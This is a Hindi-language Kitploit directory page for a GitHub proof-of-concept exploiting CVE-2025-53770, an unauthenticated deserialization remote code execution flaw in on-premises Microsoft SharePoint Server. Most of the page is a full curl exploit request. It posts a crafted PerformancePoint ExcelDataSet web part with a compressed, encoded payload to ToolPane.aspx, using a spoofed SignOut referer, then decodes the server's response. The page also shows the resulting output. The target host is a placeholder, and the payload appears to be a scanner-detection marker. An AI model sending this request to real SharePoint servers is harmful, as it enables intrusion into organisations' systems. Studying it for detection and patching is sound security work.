Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-53770 — Microsoft SharePoint Server में असुरक्षित डिसीरियलाइज़ेशन के माध्यम से असत्यापित दूरस्थ कोड निष्पादन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट (CVE-2025-53770), जिसमें पेलोड निष्कर्षण और डीकोडिंग कमांड शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/0xray5c68616e37/cve-2025-53770
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHub0xray5c68616e37/cve-2025-53770

cve-2025-53770

Microsoft SharePoint Server में असुरक्षित डिसीरियलाइज़ेशन के माध्यम से असत्यापित दूरस्थ कोड निष्पादन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट (CVE-2025-53770), जिसमें पेलोड निष्कर्षण और डीकोडिंग कमांड शामिल हैं।

रिपॉजिटरी देखेंवेबसाइट
311 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-53770 SharePoint Deserialization RCE PoC

Critical — Microsoft SharePoint Server में असुरक्षित डिसीरियलाइज़ेशन के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन (CVE-2025-53770)

विवरण

ऑन-प्रिमाइसेस Microsoft SharePoint Server में अविश्वसनीय डेटा का डिसीरियलाइज़ेशन एक हमलावर को दूरस्थ रूप से कोड निष्पादित करने और सिस्टम से समझौता करने की अनुमति देता है। Microsoft सक्रिय शोषण से अवगत है और एक व्यापक अद्यतन तैयार कर रहा है। सुनिश्चित करें कि CVE दस्तावेज़ीकरण से शमन उपाय मौजूद हैं।

  • प्रभाव: बिना प्रमाणीकरण के हमलावर रिमोट कोड निष्पादन प्राप्त कर सकते हैं, जिससे पूर्ण सिस्टम से समझौता हो सकता है।
  • गंभीरता: गंभीर

प्रमाण अवधारणा

निम्नलिखित PoC दर्शाता है कि कैसे एक हमलावर कमजोर एंडपॉइंट के माध्यम से दुर्भावनापूर्ण पेलोड निकालने और डिकोड करने के लिए भेद्यता का शोषण कर सकता है।

लक्ष्य डोमेन को जानबूझकर reeaccated.com से बदल दिया गया है।

कमांड

root@kitploit:~
curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
  --data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'

आउटपुट

root@kitploit:~
<Info>IntruderScannerDetectionPayload</Info>
चित्र

संदर्भ

  • परीक्षण पेलोड कार्यान्वयन
  • कोड व्हाइट सुरक्षा विश्लेषण
  • माइक्रोसॉफ्ट मार्गदर्शन
  • NVD प्रविष्टि

प्रभाव:
बिना प्रमाणीकरण के हमलावर SharePoint Server पर असुरक्षित डिसीरियलाइज़ेशन का शोषण करके रिमोट कोड निष्पादन प्राप्त कर सकते हैं, जिससे पूर्ण सिस्टम से समझौता हो सकता है।

टूल डाउनलोड करें